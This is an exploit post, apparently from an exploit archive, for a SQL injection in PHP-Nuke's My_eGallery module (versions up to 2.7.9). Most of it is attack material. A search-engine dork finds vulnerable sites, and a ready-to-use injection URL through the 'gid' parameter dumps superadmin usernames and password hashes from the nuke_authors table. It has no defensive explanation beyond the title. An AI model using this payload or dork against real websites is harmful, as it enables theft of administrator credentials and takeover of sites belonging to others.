id: 2707
date: 02/28/2008
title: PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability
author: Aria-Security Team
cves: 

================================================================
PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability
================================================================



Aria-Security Team

-----------------------------

Shoutz: Aura, Null, imm02tal, Kinglet, and our staff
PHP-Nuke My_eGallery "gid" Remote SQL Injection
Dork: inurl:"modules.php?name=My_eGallery"

modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

The-0utl4w




#  0day.today [2023-03-25]  #